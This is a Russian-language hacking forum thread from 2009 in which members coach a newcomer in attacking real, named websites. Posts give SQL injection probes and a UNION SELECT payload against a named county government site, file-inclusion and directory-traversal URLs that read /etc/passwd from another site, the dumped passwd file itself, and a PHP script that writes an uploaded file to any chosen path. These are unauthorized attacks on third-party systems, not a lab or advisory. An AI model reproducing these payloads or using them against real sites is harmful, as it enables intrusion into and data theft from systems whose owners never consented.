ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
06.09.2009, 23:01
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от geforce
Это уязвимость???
http://arbrand.ru/kat_pos.php?id=-1
пробуй логику если не уверен
http://arbrand.ru/kat_pos.php?id=1+and+1=1 и
http://arbrand.ru/kat_pos.php?id=1+and+1=0
ну и различные /* -- # если резултат ни какого изменения то не уязвимость =)
ЗЫ проверил , не пашет логика =)
|
|
|
06.09.2009, 23:06
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Shadrin, Max upload filesize ограничение скорей всего
|
|
|
|
06.09.2009, 23:12
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
Сообщение от попугай
Shadrin, Max upload filesize ограничение скорей всего
4 килобайта попробовал загурузить пофик
|
|
|
|
06.09.2009, 23:16
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Shadrin
4 килобайта попробовал загурузить пофик
Сервак на винде? Иногда там временная папка для аплоаденных файлов не задана или некорректно задана и php не может файл прочитать.
Попробуй создай php файл следующий
<?php if(isset($_POST[ok])){
if(copy($_FILES[fnm][tmp_name], $_POST[name]))
{
echo "<a href=" . $_POST[name] . ">Click</a>";
} else {
die("err");
}
}?><form method=post enctype=multipart/form-data><input type=text name=name><input type=file name=fnm><br> <input type=submit name=ok><br></form> и им попробуй аплоаднуть.
|
|
|
|
06.09.2009, 23:18
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Сообщение от HAXTA4OK
пробуй логику если не уверен
http://arbrand.ru/kat_pos.php?id=1+and+1=1 и
http://arbrand.ru/kat_pos.php?id=1+and+1=0
ну и различные /* -- # если резултат ни какого изменения то не уязвимость =)
ЗЫ проверил , не пашет логика =)
http://arbrand.ru/index.php?id=info&razdel=zakon&stat=-1'
|
|
|
|
06.09.2009, 23:19
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
это дыра в пхп кодах Пхп иньекция
Вот тебе скуля
http://www.warrencountypa.net/current/com.php?ID=1
На ней практикуйся
|
|
|
|
06.09.2009, 23:22
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от geforce
А вот это уязвимость???
http://arbrand.ru/index.php?id=info&razdel=zakon&stat=-1'
это пхп инъекция
result :
http://arbrand.ru/index.php?id=info&razdel=zakon&stat=../../index.php%00
http://arbrand.ru/index.php?id=info&razdel=zakon&stat=../../../../../etc/passwd
PS жесткий прикол Новичок (7/-4) ± гринки 7 простой -4 
Последний раз редактировалось HAXTA4OK; 06.09.2009 в 23:27..
|
|
|
|
07.09.2009, 00:00
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Сообщение от HAXTA4OK
это пхп инъекция
result :
http://arbrand.ru/index.php?id=info&razdel=zakon&stat=../../index.php%00
http://arbrand.ru/index.php?id=info&razdel=zakon&stat=../../../../../etc/passwd
PS жесткий прикол Новичок (7/-4) ± гринки 7 простой -4
2 Что полезного моно от сюда извлечь????
Код:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news
Последний раз редактировалось geforce; 07.09.2009 в 00:05..
|
|
|
|
07.09.2009, 00:09
|
|
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686
Репутация:
-25
|
|
Сообщение от [x60]unu
это дыра в пхп кодах Пхп иньекция
Вот тебе скуля
http://www.warrencountypa.net/current/com.php?ID=1
На ней практикуйся
|
|
|
|
07.09.2009, 06:11
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
Сообщение от geforce
Это же вроде скрытая скула???http://www.warrencountypa.net/current/com.php?ID=-1
Ты когда мозгами думать начнешь, а не тупо бежать задавать тупые вопросы в этой ветке?
_http://www.warrencountypa.net/current/com.php?ID=-1+union+select+1,concat_ws(0x3a,user(),version()), 3,4,5,6+--+
Сообщение от geforce
1 А бываю Flash Shell на action script написанные??
2 Что полезного моно от сюда извлечь????
Код:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news
1. флеш исполняется на стороне юзера, нет
2. ничего
Последний раз редактировалось BlackSun; 07.09.2009 в 06:13..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.jpg?1505650){kind=avatar}
Похожие темы
Линейный вид
